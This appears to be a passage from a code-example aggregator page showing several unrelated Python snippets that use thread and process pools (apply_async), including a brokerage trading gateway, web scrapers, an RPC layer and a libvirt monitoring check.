                        scan cycle: {:d}. Resolution is native.""".format(
                            name.name(), scan_cycle_to_use))

        ####################################################################
        # Create population map instance from a result instance
        ####################################################################

        elif (diffeomorphism_nb == 'fit'):

            if result is None:
                print('{}: No fit found'.format(name.name()))
                df.ix[index, 'valid'] = False
                lock.conditional_unlock(df, index, verbose)
                return

            population_map = result.population_map
            population_map.set_vb(
                template=result.get_field('intercept', 'point'))

            if verbose:
                print('{}: VB space equals reference space as given by fit'.
                      format(name.name()))

        else:
            print('{}: Diffeomorphism type not supported'.format(name.name()))

        if verbose > 2:
            print("""{}:
                {}
                {}""".format(name.name(),
                             population_map.diffeomorphism.describe(),
                             population_map.describe()))

        try:
            if verbose:
                print('{}: Save: {}'.format(name.name(), file_population_map))

            population_map.save(file_population_map)
            df.ix[index, 'locked'] = False

        except Exception as e:
            df.ix[index, 'valid'] = False
            print('{}: Unable to create: {}, {}'.format(
                name.name(), file_population_map, e))
            lock.conditional_unlock(df, index, verbose, True)
            return

        return

    ####################################################################

    if len(df) > 1 and ((args.cores is None) or (args.cores > 1)):
        try:
            pool = ThreadPool(args.cores)
            for index, name, files, instances in study_iterator:
                session = instances['session']
                reference_maps = instances['reference_maps']
                population_map = instances['population_map']
                result = instances['result']
                file_population_map = files['population_map']
                wm
                pool.apply_async(wm,
                                 args=(index, name, session, reference_maps,
                                       population_map, result,
                                       file_population_map))
            pool.close()
            pool.join()
        except Exception as e:
            pool.close()
            pool.terminate()
            print('Pool execution has been terminated')
            print(e)
        finally:
            files = df.ix[df.locked, 'population_map'].values
            if len(files) > 0:
                for f in files:
                    print('Unlock: {}'.format(f))
                    os.remove(f)
    else:
        try:
            print('Process protocol entries sequentially')
            for index, name, files, instances in study_iterator:
                session = instances['session']
                reference_maps = instances['reference_maps']
                population_map = instances['population_map']
                result = instances['result']
                file_population_map = files['population_map']
                wm(index, name, session, reference_maps, population_map,
                   result, file_population_map)
        finally:
            files = df.ix[df.locked, 'population_map'].values
            if len(files) > 0:
                for f in files:
                    print('Unlock: {}'.format(f))
                    os.remove(f)

    ####################################################################
    # Write study to disk
    ####################################################################

    if args.out is not None:
        if args.verbose:
            print('Save: {}'.format(args.out))

        dfile = os.path.dirname(args.out)
        if dfile and not isdir(dfile):
            os.makedirs(dfile)

        study.save(args.out)

    if args.push:
        if args.verbose:
            print('Save: {}'.format(args.study))
        study.save(args.study)

Example #41

0

Show file

File: TimeSeries.py Project: lewismc/incubator-sdap-nexus

    def getTimeSeriesStatsForBoxSingleDataSet(self, bounding_polygon, ds, start_seconds_from_epoch,
                                              end_seconds_from_epoch,
                                              apply_seasonal_cycle_filter=True, apply_low_pass_filter=True):

        the_time = datetime.now()
        daysinrange = self._tile_service.find_days_in_range_asc(bounding_polygon.bounds[1],
                                                                bounding_polygon.bounds[3],
                                                                bounding_polygon.bounds[0],
                                                                bounding_polygon.bounds[2],
                                                                ds,
                                                                start_seconds_from_epoch,
                                                                end_seconds_from_epoch)
        self.log.info("Finding days in range took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        if len(daysinrange) == 0:
            raise NoDataException(reason="No data found for selected timeframe")

        the_time = datetime.now()
        maxprocesses = int(self.algorithm_config.get("multiprocessing", "maxprocesses"))

        results = []
        if maxprocesses == 1:
            calculator = TimeSeriesCalculator()
            for dayinseconds in daysinrange:
                result = calculator.calc_average_on_day(bounding_polygon.wkt, ds, dayinseconds)
                results += [result] if result else []
        else:
            # Create a task to calc average difference for each day
            manager = Manager()
            work_queue = manager.Queue()
            done_queue = manager.Queue()
            for dayinseconds in daysinrange:
                work_queue.put(
                    ('calc_average_on_day', bounding_polygon.wkt, ds, dayinseconds))
            [work_queue.put(SENTINEL) for _ in xrange(0, maxprocesses)]

            # Start new processes to handle the work
            pool = Pool(maxprocesses)
            [pool.apply_async(pool_worker, (work_queue, done_queue)) for _ in xrange(0, maxprocesses)]
            pool.close()

            # Collect the results as [(day (in ms), average difference for that day)]
            for i in xrange(0, len(daysinrange)):
                result = done_queue.get()
                try:
                    error_str = result['error']
                    self.log.error(error_str)
                    raise NexusProcessingException(reason="Error calculating average by day.")
                except KeyError:
                    pass

                results += [result] if result else []

            pool.terminate()
            manager.shutdown()

        results = sorted(results, key=lambda entry: entry["time"])
        self.log.info("Time series calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        if apply_seasonal_cycle_filter:
            the_time = datetime.now()
            for result in results:
                month = datetime.utcfromtimestamp(result['time']).month
                month_mean, month_max, month_min = self.calculate_monthly_average(month, bounding_polygon.wkt, ds)
                seasonal_mean = result['mean'] - month_mean
                seasonal_min = result['min'] - month_min
                seasonal_max = result['max'] - month_max
                result['meanSeasonal'] = seasonal_mean
                result['minSeasonal'] = seasonal_min
                result['maxSeasonal'] = seasonal_max
            self.log.info(
                "Seasonal calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        the_time = datetime.now()
        filtering.applyAllFiltersOnField(results, 'mean', applySeasonal=False, applyLowPass=apply_low_pass_filter)
        filtering.applyAllFiltersOnField(results, 'max', applySeasonal=False, applyLowPass=apply_low_pass_filter)
        filtering.applyAllFiltersOnField(results, 'min', applySeasonal=False, applyLowPass=apply_low_pass_filter)

        if apply_seasonal_cycle_filter and apply_low_pass_filter:
            try:
                filtering.applyFiltersOnField(results, 'meanSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
                filtering.applyFiltersOnField(results, 'minSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
                filtering.applyFiltersOnField(results, 'maxSeasonal', applySeasonal=False, applyLowPass=True,
                                         append="LowPass")
            except Exception as e:
                # If it doesn't work log the error but ignore it
                tb = traceback.format_exc()
                self.log.warn("Error calculating SeasonalLowPass filter:\n%s" % tb)

        self.log.info(
            "LowPass filter calculation took %s for dataset %s" % (str(datetime.now() - the_time), ds))

        return results, {}

Example #42

0

Show file

File: tiger_gateway.py Project: systemtrader/VN-CTP

class TigerGateway(BaseGateway):
    """"""
    default_setting = {
        "tiger_id": "",
        "account": "",
        "standard_account": "",
        "private_key": '',
    }

    def __init__(self, event_engine):
        """Constructor"""
        super(TigerGateway, self).__init__(event_engine, "TIGER")

        self.tiger_id = ""
        self.account = ""
        self.standard_account = ""
        self.paper_account = ""
        self.language = ""

        self.client_config = None
        self.quote_client = None
        self.push_client = None

        self.local_id = 1000000
        self.tradeid = 0

        self.active = False
        self.queue = Queue()
        self.pool = None

        self.ID_TIGER2VT = {}
        self.ID_VT2TIGER = {}
        self.ticks = {}
        self.trades = set()
        self.contracts = {}
        self.symbol_names = {}

    def run(self):
        """"""
        while self.active:
            try:
                func, args = self.queue.get(timeout=0.1)
                func(*args)
            except Empty:
                pass

    def add_task(self, func, *args):
        """"""
        self.queue.put((func, [*args]))

    def connect(self, setting: dict):
        """"""
        self.private_key = setting['private_key']
        self.tiger_id = setting["tiger_id"]
        self.account = setting["account"]
        self.standard_account = setting["standard_account"]
        self.paper_account = setting["account"]
        self.languege = Language.zh_CN

        # Start thread pool for REST call
        self.active = True
        self.pool = Pool(5)
        self.pool.apply_async(self.run)

        # Put connect task into quque.
        self.init_client_config()
        self.add_task(self.connect_quote)
        self.add_task(self.connect_trade)
        self.add_task(self.connect_push)

    def init_client_config(self, sandbox=True):
        """"""
        self.client_config = TigerOpenClientConfig(sandbox_debug=sandbox)
        self.client_config.private_key = self.private_key
        self.client_config.tiger_id = self.tiger_id
        self.client_config.account = self.account
        self.client_config.standard_account = self.standard_account
        self.client_config.paper_account = self.paper_account
        self.client_config.language = self.language

    def connect_quote(self):
        """
        Connect to market data server.
        """
        try:
            self.quote_client = QuoteClient(self.client_config)
            self.symbol_names = dict(
                self.quote_client.get_symbol_names(lang=Language.zh_CN))
            self.query_contract()
        except ApiException:
            self.write_log("查询合约失败")
            return

        self.write_log("行情接口连接成功")
        self.write_log("合约查询成功")

    def connect_trade(self):
        """
        Connect to trade server.
        """
        self.trade_client = TradeClient(self.client_config)
        try:
            self.add_task(self.query_order)
            self.add_task(self.query_position)
            self.add_task(self.query_account)
        except ApiException:
            self.write_log("交易接口连接失败")
            return

        self.write_log("交易接口连接成功")

    def connect_push(self):
        """
        Connect to push server.
        """
        protocol, host, port = self.client_config.socket_host_port
        self.push_client = PushClient(host, port, (protocol == 'ssl'))
        self.push_client.connect(self.client_config.tiger_id,
                                 self.client_config.private_key)

        self.push_client.quote_changed = self.on_quote_change
        self.push_client.asset_changed = self.on_asset_change
        self.push_client.position_changed = self.on_position_change
        self.push_client.order_changed = self.on_order_change

        self.write_log("推送接口连接成功")

    def subscribe(self, req: SubscribeRequest):
        """"""
        self.push_client.subscribe_quote([req.symbol])
        self.push_client.subscribe_asset()
        self.push_client.subscribe_position()
        self.push_client.subscribe_order()

    def on_quote_change(self, tiger_symbol: str, data: list, trading: bool):
        """"""
        data = dict(data)
        symbol, exchange = convert_symbol_tiger2vt(tiger_symbol)

        tick = self.ticks.get(symbol, None)
        if not tick:
            tick = TickData(
                symbol=symbol,
                exchange=exchange,
                gateway_name=self.gateway_name,
                datetime=datetime.now(),
                name=self.symbol_names[symbol],
            )
            self.ticks[symbol] = tick

        tick.datetime = datetime.fromtimestamp(data["latest_time"] / 1000)
        tick.pre_close = data.get("prev_close", 0)
        tick.last_price = data.get("latest_price", 0)
        tick.volume = data.get("volume", 0)
        tick.open_price = data.get("open", 0)
        tick.open_price = data.get("open", 0)
        tick.high_price = data.get("high", 0)
        tick.low_price = data.get("low", 0)
        tick.ask_price_1 = data.get("ask_price", 0)
        tick.bid_price_1 = data.get("bid_price", 0)
        tick.ask_volume_1 = data.get("ask_size", 0)
        tick.bid_volume_1 = data.get("bid_size", 0)

        self.on_tick(copy(tick))

    def on_asset_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        if "net_liquidation" not in data:
            return

        account = AccountData(
            accountid=tiger_account,
            balance=data["net_liquidation"],
            frozen=0.0,
            gateway_name=self.gateway_name,
        )
        self.on_account(account)

    def on_position_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        symbol, exchange = convert_symbol_tiger2vt(data["origin_symbol"])

        pos = PositionData(
            symbol=symbol,
            exchange=exchange,
            direction=Direction.NET,
            volume=int(data["quantity"]),
            frozen=0.0,
            price=data["average_cost"],
            pnl=data["unrealized_pnl"],
            gateway_name=self.gateway_name,
        )
        self.on_position(pos)

    def on_order_change(self, tiger_account: str, data: list):
        """"""
        data = dict(data)
        print("委托推送", data["origin_symbol"], data["order_id"], data["filled"],
              data["status"])
        symbol, exchange = convert_symbol_tiger2vt(data["origin_symbol"])
        status = PUSH_STATUS_TIGER2VT[data["status"]]

        order = OrderData(
            symbol=symbol,
            exchange=exchange,
            orderid=self.ID_TIGER2VT.get(str(data["order_id"]),
                                         self.get_new_local_id()),
            direction=Direction.NET,
            price=data.get("limit_price", 0),
            volume=data["quantity"],
            traded=data["filled"],
            status=status,
            time=datetime.fromtimestamp(data["order_time"] /
                                        1000).strftime("%H:%M:%S"),
            gateway_name=self.gateway_name,
        )
        self.on_order(order)

        if status == Status.ALLTRADED:
            self.tradeid += 1

            trade = TradeData(
                symbol=symbol,
                exchange=exchange,
                direction=Direction.NET,
                tradeid=self.tradeid,
                orderid=self.ID_TIGER2VT[str(data["order_id"])],
                price=data["avg_fill_price"],
                volume=data["filled"],
                time=datetime.fromtimestamp(data["trade_time"] /
                                            1000).strftime("%H:%M:%S"),
                gateway_name=self.gateway_name,
            )
            self.on_trade(trade)

    def get_new_local_id(self):
        self.local_id += 1
        return self.local_id

    def send_order(self, req: OrderRequest):
        """"""
        local_id = self.get_new_local_id()
        order = req.create_order_data(local_id, self.gateway_name)

        self.on_order(order)
        self.add_task(self._send_order, req, local_id)
        return order.vt_orderid

    def _send_order(self, req: OrderRequest, local_id):
        """"""
        currency = config_symbol_currency(req.symbol)
        try:
            contract = self.trade_client.get_contracts(symbol=req.symbol,
                                                       currency=currency)[0]
            order = self.trade_client.create_order(
                account=self.account,
                contract=contract,
                action=DIRECTION_VT2TIGER[req.direction],
                order_type=ORDERTYPE_VT2TIGER[req.type],
                quantity=int(req.volume),
                limit_price=req.price,
            )
            self.ID_TIGER2VT[str(order.order_id)] = local_id
            self.ID_VT2TIGER[local_id] = str(order.order_id)

            self.trade_client.place_order(order)
            print("发单:", order.contract.symbol, order.order_id, order.quantity,
                  order.status)

        except:  # noqa
            traceback.print_exc()
            self.write_log("发单失败")
            return

    def cancel_order(self, req: CancelRequest):
        """"""
        self.add_task(self._cancel_order, req)

    def _cancel_order(self, req: CancelRequest):
        """"""
        try:
            order_id = self.ID_VT2TIGER[req.orderid]
            data = self.trade_client.cancel_order(order_id=order_id)
        except ApiException:
            self.write_log(f"撤单失败：{req.orderid}")

        if not data:
            self.write_log('撤单成功')

    def query_contract(self):
        """"""
        # HK Stock

        symbols_names_HK = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.HK)
        contract_names_HK = DataFrame(symbols_names_HK,
                                      columns=['symbol', 'name'])

        contractList = list(contract_names_HK["symbol"])
        i, n = 0, len(contractList)
        result = pd.DataFrame()
        while i < n:
            i += 500
            c = contractList[i - 500:i]
            r = self.quote_client.get_trade_metas(c)
            result = result.append(r)

        contract_detail_HK = result.sort_values(by="symbol", ascending=True)
        contract_HK = pd.merge(contract_names_HK,
                               contract_detail_HK,
                               how='left',
                               on='symbol')

        for ix, row in contract_HK.iterrows():
            contract = ContractData(
                symbol=row["symbol"],
                exchange=Exchange.SEHK,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=row["min_tick"],
                net_position=True,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

        # US Stock
        symbols_names_US = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.US)
        contract_US = DataFrame(symbols_names_US, columns=['symbol', 'name'])

        for ix, row in contract_US.iterrows():
            contract = ContractData(
                symbol=row["symbol"],
                exchange=Exchange.SMART,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=0.001,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

        # CN Stock
        symbols_names_CN = self.quote_client.get_symbol_names(
            lang=Language.zh_CN, market=Market.CN)
        contract_CN = DataFrame(symbols_names_CN, columns=['symbol', 'name'])

        for ix, row in contract_CN.iterrows():
            symbol = row["symbol"]
            symbol, exchange = convert_symbol_tiger2vt(symbol)

            contract = ContractData(
                symbol=symbol,
                exchange=exchange,
                name=row["name"],
                product=Product.EQUITY,
                size=1,
                pricetick=0.001,
                gateway_name=self.gateway_name,
            )
            self.on_contract(contract)
            self.contracts[contract.vt_symbol] = contract

    def query_account(self):
        """"""
        try:
            assets = self.trade_client.get_assets()
        except ApiException:
            self.write_log("查询资金失败")
            return

        for i in assets:
            account = AccountData(
                accountid=self.account,
                balance=i.summary.net_liquidation,
                frozen=0.0,
                gateway_name=self.gateway_name,
            )

            self.on_account(account)

    def query_position(self):
        """"""
        try:
            position = self.trade_client.get_positions()
        except ApiException:
            self.write_log("查询持仓失败")
            return

        for i in position:
            symbol, exchange = convert_symbol_tiger2vt(i.contract.symbol)

            pos = PositionData(
                symbol=symbol,
                exchange=exchange,
                direction=Direction.NET,
                volume=int(i.quantity),
                frozen=0.0,
                price=i.average_cost,
                pnl=float(i.unrealized_pnl),
                gateway_name=self.gateway_name,
            )

            self.on_position(pos)

    def query_order(self):
        """"""
        try:
            data = self.trade_client.get_orders()
            data = sorted(data, key=lambda x: x.order_time, reverse=False)
        except:  # noqa
            traceback.print_exc()
            self.write_log("查询委托失败")
            return

        self.process_order(data)
        self.process_deal(data)

    def close(self):
        """"""
        self.active = False

        if self.push_client:
            self.push_client.disconnect()

    def process_order(self, data):
        """"""
        for i in data:
            symbol, exchange = convert_symbol_tiger2vt(str(i.contract))
            local_id = self.get_new_local_id()

            order = OrderData(
                symbol=symbol,
                exchange=exchange,
                orderid=local_id,
                direction=Direction.NET,
                price=i.limit_price if i.limit_price else 0.0,
                volume=i.quantity,
                traded=i.filled,
                status=STATUS_TIGER2VT[i.status],
                time=datetime.fromtimestamp(i.order_time /
                                            1000).strftime("%H:%M:%S"),
                gateway_name=self.gateway_name,
            )
            self.ID_TIGER2VT[str(i.order_id)] = local_id
            self.on_order(order)

        self.ID_VT2TIGER = {v: k for k, v in self.ID_TIGER2VT.items()}
        print("原始委托字典", self.ID_TIGER2VT)
        print("原始反向字典", self.ID_VT2TIGER)

    def process_deal(self, data):
        """
        Process trade data for both query and update.
        """
        for i in data:
            if i.status == ORDER_STATUS.PARTIALLY_FILLED or i.status == ORDER_STATUS.FILLED:
                symbol, exchange = convert_symbol_tiger2vt(str(i.contract))
                self.tradeid += 1

                trade = TradeData(
                    symbol=symbol,
                    exchange=exchange,
                    direction=Direction.NET,
                    tradeid=self.tradeid,
                    orderid=self.ID_TIGER2VT[str(i.order_id)],
                    price=i.avg_fill_price,
                    volume=i.filled,
                    time=datetime.fromtimestamp(i.trade_time /
                                                1000).strftime("%H:%M:%S"),
                    gateway_name=self.gateway_name,
                )

                self.on_trade(trade)

Example #43

0

Show file

class NewsSpider:
    def __init__(self):
        self.url_temp = "https://no.imwu-nl.com/articles/news/page{}/"  # 用于拼接的URL地址，加大括号是为了format赋值
        self.url_temp_header = "https://no.imwu-nl.com/articles/news/"  # 首页URL地址
        self.host_header = "https://sv.imwu-nl.com"  # 相当于host，用于拼接全详情也URL
        self.headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/604.1.34 (KHTML, "
            "like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1"
        }
        self.queue = Queue()  # 实例化一个队列
        self.pool = Pool(5)  # 实例化一个线程池，最大为5
        self.cookies = {
            "security_session_mid_verify": "e63dce6af1e6dee46a3a145b79f7557d"
        }  # 针对一些有反爬措施的网站，带上cookie
        self.is_running = True  # 回调标志位
        self.total_requests_num = 0  # 待完成任务数量
        self.total_response_num = 0  # 完成任务数量

    def parse_url_list(self, html):
        # 解析列表页HTML，获取详情页URL列表
        html = etree.HTML(html)
        url_list = html.xpath(
            "//div[@class='post-card__info']/h2[@class='post-card__title']/a/@href"
        )
        return url_list

    def get_url_list(self):
        # 构造URL列表页网址，拼接补全详情页URL，并加入到队列
        for i in range(2000, 4000):  # range为左闭右开，表示从1到100循环，i代表每次循环的值
            if i == 1:  # 针对首页不带后缀的，使用头URL
                html = self.parse_url(self.url_temp_header)
            else:
                html = self.parse_url(self.url_temp.format(i))
            # 获取详情页URL，并将详情页URL加入到任务队列
            url_list = self.parse_url_list(html)
            for url in url_list:
                url = self.host_header + url  # 如果详情页URL不完整，手动补全
                #url =url  # 如果详情页URL不完整，手动补全
                print(url)
                self.queue.put(url)  # 队列任务加1
                self.total_requests_num += 1  # 数量加1

    def parse_url(self, url):
        time.sleep(0.5)
        # 发送请求，获取响应
        response = requests.get(url, headers=self.headers)
        # 需要session的话，注释掉上面的代码，使用下面代码
        # session = requests.session()
        # response = session.get(url, headers=headers)
        return response.content.decode()  # conten方法解析不出内容的话，换成text

    def split_content(self, content):
        """
        根据标点符号切割文本句子
        :param content: 原始字符串
        :return: 切割后的文本
        """
        content_list = list()
        e = 0
        for k, v in enumerate(content):
            if k == 0:
                if v == ".":
                    e = 1
            elif k < len(content) - 1:
                if v == ".":
                    if content[k - 1] != "." and content[k + 1] != ".":
                        if content[k -
                                   1].isdecimal() and content[k +
                                                              1].isdecimal():
                            continue
                        if content[k - 1].isalpha() and content[k +
                                                                1].isalpha():
                            continue
                        content_list.append(content[e:k].strip())
                        e = k + 1
                if v == "?":
                    if content[k - 1] != "?" and content[
                            k + 1] != "?" and content[k + 1] != ")":
                        content_list.append(content[e:k + 1].strip())
                        e = k + 1
                # if v == ";" and len(content) > 200:
                #     content_list.append(content[e:k + 1].strip())
                #     e = k + 1
                if v == "!":
                    content_list.append(content[e:k + 1].strip())
                    e = k + 1
            else:
                if v == ".":
                    content_list.append(content[e:-1].strip())
                else:
                    content_list.append(content[e:].strip())
        return content_list

    def get_content_list(self, html_str):
        # 提取详情也的文本内容，返回文本列表
        html = etree.HTML(html_str)
        contents = html.xpath(
            "//article[@class='post']/div[@class='post-content']/p/text()")
        content_list = []
        for content in contents:
            # if letter_regex.findall(content):
            #     continue
            if content.strip():
                content_merge_list = self.split_content(
                    content.replace("\u200b", "").replace(u'\xa0', u' '))
                content_list.append(content_merge_list)
        return content_list

    def save_content_list(self, content_list):
        # 保存数据到本地
        with open('挪威语——新闻——科技新闻-sv.imwu-nl.com2000-4000.txt',
                  'a',
                  encoding='utf-8') as f:
            for contents in content_list:
                for content in contents:
                    if len(content) < 5:
                        continue
                    f.write(content + '\n')

    def exetute_requests_item_save(self):
        # 单个请求任务完整执行逻辑
        url = self.queue.get()  # 从队列中拿出一个URL
        print(url)
        html_str = self.parse_url(url)  # 发起请求获取响应内容
        content_list = self.get_content_list(html_str)  # 解析响应内容，返回初步清洗文本
        self.save_content_list(content_list)  # 保存到本地文件
        self.total_response_num += 1  # 任务完成数量加1，单线程所有任务完成

    def _callback(self, temp):
        # 保证函数能够被异步重复执行，self.is_running作用为递归退出条件
        if self.is_running:
            self.pool.apply_async(self.exetute_requests_item_save,
                                  callback=self._callback)

    def run(self):
        # 主程序
        self.get_url_list()  # 执行该方法，将所有详情页的url加入到队列

        for i in range(10):  # 控制并发
            self.pool.apply_async(self.exetute_requests_item_save,
                                  callback=self._callback)

        while True:  # 防止主线程结束
            time.sleep(0.0001)  # 避免cpu空转，浪费资源
            print("总任务数%s个,已完成任务%s个" %
                  (self.total_requests_num, self.total_response_num))
            if self.total_response_num >= self.total_requests_num:
                self.is_running = False
                break

        self.pool.close()  # 关闭线程池，防止新的线程开启

Example #44

0

Show file

File: tag.py Project: xinlawliet/bilibili-data

#!/usr/bin/python
# -*- coding: utf-8 -*-

from multiprocessing.dummy import Pool as ThreadPool
from bilisupport import TAGLIST, ERRORLIST, API_TAGINFO
import requests


def taginfo(tid):
    '''获取tag信息'''
    if not tid:
        return 404
    tid = int(tid)
    tagparams = {'id': tid, 'jsonp': 'jsonp'}
    info = requests.get(url=API_TAGINFO, params=tagparams).json()
    if info.get('code') == 0:
        print(info.get('result'))
        TAGLIST.update({'tag_id': tid}, {'$set': info.get('result')},
                       upsert=True)
    else:
        ERRORLIST.insert_one({'tag_id': tid})


if __name__ == '__main__':
    # taginfo(2053)
    MULTIPOOL = ThreadPool(4)
    for i in range(1, 1773900):
        MULTIPOOL.apply_async(taginfo, (i, ))
    MULTIPOOL.close()
    MULTIPOOL.join()

Example #45

0

Show file

class RpcLayer(JsonRpcMessageApplication):
    def __init__(self, host_url=u"amqp://127.0.0.1", ioloop=None, **params):
        super(RpcLayer, self).__init__(host_url=host_url,
                                       ioloop=ioloop,
                                       **params)
        self._pending = dict()
        self._pool = Pool()
        self.msg_handler = None

    def send_result(self, receiver, result, id):

        exchange = str(receiver).split(".")[0]
        self.route(receiver,
                   JsonRPCResult(result=result, id=id),
                   exchange=exchange)

    def send_error(self, receiver, code, id, *args, **kwargs):
        self.route(receiver,
                   JsonRPCError(code=code, id=id, args=args, kwargs=kwargs))

    def call(self, method, *args, **kwargs):

        corr_id = str(uuid.uuid4())
        ret = Deferred()
        self._pending[corr_id] = ret
        self.route(
            method,
            JsonRPCCall(method=method, args=args, kwargs=kwargs, id=corr_id))
        return ret

    def publish(self, routing_key, msg, **params):

        corr_id = str(uuid.uuid4())
        ret = Deferred()
        self._pending[corr_id] = ret
        self.route(routing_key, JsonRPCNotify(method=routing_key,
                                              args=(msg, )), **params)
        return ret

    def callSync(self, timeout, rpc_name, *args, **kwargs):
        @sync(timeout=timeout)
        def wrap():
            return self.call(rpc_name, *args, **kwargs)

        return wrap()

    def notify(self, method, *args, **kwargs):
        self.publish(method,
                     JsonRPCNotify(method=method, args=args, kwargs=kwargs))

    def deregister(self, routing_key, **params):
        params["method"] = "anycast"
        super(RpcLayer, self).unsubscribe(routing_key, **params)

    def unsubscribe(self, routing_key, **params):
        super(RpcLayer, self).unsubscribe(routing_key, **params)

    def subscribe(self, routing_key, function_pointer, frame=False, **params):

        self.logger.debug("Subscribing to %s with params: %s" %
                          (routing_key, params))

        if function_pointer is None:
            function_pointer = self.receive
        else:
            if not frame:
                function_pointer = self._make_handler(function_pointer)
            function_pointer = self.apply_in_pool(function_pointer)

        super(RpcLayer, self).subscribe(routing_key,
                                        function_pointer=function_pointer,
                                        **params)

    def register_direct(self, routing_key, msg_handler):
        pass

    def register(self, routing_key, function_pointer=None, **params):

        if function_pointer is None:
            function_pointer = self.receive
        else:
            function_pointer = self._make_handler(function_pointer)
            function_pointer = self.apply_in_pool(function_pointer)

        params = params or dict()
        params["method"] = "anycast"
        self._top_layer.subscribe(routing_key,
                                  function_pointer=function_pointer,
                                  **params)

    def receive(self, *args, **kwargs):
        self._pool.apply_async(func=self._receive, args=args, kwds=kwargs)

    def apply_in_pool(self, function):
        def apply_f(*args, **kwargs):
            self._pool.apply_async(func=function, args=args, kwds=kwargs)

        apply_f.func_name = function.func_name
        return apply_f

    def _make_handler(self, function):
        """

        This method creates a wrapper for the given "function".

        This serves two purposes:

        A) Send the result back to the caller.

        B) Create an environment for asynchronous RPC within function.

        :param function:
        :param reply_to:
        :param corr_id:
        :return:
        """

        # ----------------- INTERNAL FUNCTION ------------------------------------------------------------

        @inlineCallbacks
        def on_call(routing_key, message, sender=None, **params):

            assert self.logger

            if isinstance(message, JsonRPCCall):
                try:
                    self.logger.info(
                        "-------------------CALL TO COMPONENT-----------------------"
                    )
                    self.logger.info(
                        "Executing function '%s' with argument(s) %s and %s",
                        function.func_name, message.get_args,
                        message.get_kwargs)
                    res = yield function(*message.get_args,
                                         **message.get_kwargs)
                    # self._out_channel.basic_ack(delivery_tag=delivery_tag)
                    self.send_result(result=res,
                                     receiver=sender,
                                     id=message.get_id)
                except BaseException as e:
                    self.logger.info(
                        "----------------CALL TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception(
                        "Message: \n %s \n caused an Error: \n %s" %
                        (message, e))
                    self.send_error(code=1,
                                    message=e.message,
                                    receiver=sender,
                                    id=message.get_id,
                                    args=e.args)
                except:
                    self.logger.info(
                        "-----------------CALL TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception("Message: \n %s \n caused an Error" %
                                          (message))
                    self.send_error(code=1, receiver=sender, id=message.get_id)

            if isinstance(message, JsonRPCNotify):
                try:
                    self.logger.info(
                        "--------------DELIVER EVENT TO COMPONENT---------------------------"
                    )
                    self.logger.info(
                        "Executing function '%s' with argument(s) %s and %s",
                        function.func_name, message.get_args,
                        message.get_kwargs)
                    function(*message.get_args, **message.get_kwargs)
                except BaseException as e:
                    self.logger.info(
                        "--------------DELIVER EVENT TO COMPONENT FAILED---------------------"
                    )
                    self.logger.exception(
                        "Message: \n %s \n caused an Error: \n %s" %
                        (message, e))

        # ----------------- INTERNAL FUNCTION ------------------------------------------------------------

        return on_call

    def _receive(self, routing_key, message, sender=None, **params):

        if isinstance(message, JsonRPCResult):
            self.logger.info(
                "----------------RECEIVED A RESULT---------------------")
            self.logger.info("Result received: \n %s" % (message))
            corr_id = message.get_id
            deferred = self._pending.get(corr_id, None)
            if deferred:
                deferred.callback(message.get_result)
                del self._pending[corr_id]

        if isinstance(message, JsonRPCError):
            self.logger.info(
                "----------------RECEIVED AN ERROR---------------------")
            self.logger.exception("Error received: \n %s" % (message))
            corr_id = message.get_id
            deferred = self._pending.get(corr_id, None)
            if deferred:
                deferred.errback(message)
                del self._pending[corr_id]

        if self.msg_handler:
            self.msg_handler(routing_key, message, sender, **params)
        pass

    def get_transport_layer(self):
        return super(RpcLayer, self).get_transport_layer()

    def set_msg_handler(self, msg_handler):
        self.msg_handler = msg_handler

Example #46

0

Show file

class LibvirtCheck(AgentCheck):
    """Inherit Agent class and gather libvirt metrics"""
    def __init__(self, name, init_config, agent_config, instances=None):
        AgentCheck.__init__(self,
                            name,
                            init_config,
                            agent_config,
                            instances=[{}])
        self.instance_cache_file = "{0}/{1}".format(
            self.init_config.get('cache_dir'), 'libvirt_instances.json')
        self.metric_cache_file = "{0}/{1}".format(
            self.init_config.get('cache_dir'), 'libvirt_metrics.json')
        self.use_bits = self.init_config.get('network_use_bits')

        self._collect_intervals = {}
        self._host_aggregate = None

        self._set_collection_intervals('disk', 'disk_collection_period')
        self._set_collection_intervals('vnic', 'vnic_collection_period')

        pool_size = self.init_config.get('max_ping_concurrency', 8)
        self.pool = Pool(pool_size)

    def _set_collection_intervals(self, interval_name, config_name):
        self._collect_intervals[interval_name] = {
            'period': int(self.init_config.get(config_name, 0)),
            'last_collect': datetime.fromordinal(1),
            'skip': False
        }

    def _test_vm_probation(self, created):
        """Test to see if a VM was created within the probation period.

        Convert an ISO-8601 timestamp into UNIX epoch timestamp from now
        and compare that against configured vm_probation.  Return the
        number of seconds this VM will remain in probation.
        """
        dt = datetime.strptime(created, '%Y-%m-%dT%H:%M:%SZ')
        created_sec = (time.time() - timegm(dt.timetuple()))
        probation_time = self.init_config.get('vm_probation',
                                              300) - created_sec
        return int(probation_time)

    def _get_metric_name(self, orig_name):
        # Rename "tx" to "out" and "rx" to "in"
        metric_name = orig_name.replace("tx", "out").replace("rx", "in")
        if self.use_bits:
            metric_name = metric_name.replace("bytes", "bits")
        return metric_name

    @staticmethod
    def _get_metric_rate_name(metric_name):
        """Change the metric name to a rate, i.e. "net.rx_bytes"
        gets converted to "net.rx_bytes_sec"
        """
        return "{0}_sec".format(metric_name)

    @staticmethod
    def _validate_secgroup(cache, instance, source_ip):
        """Search through an instance's security groups for pingability
        """
        for instance_secgroup in instance.security_groups:
            for secgroup in cache:
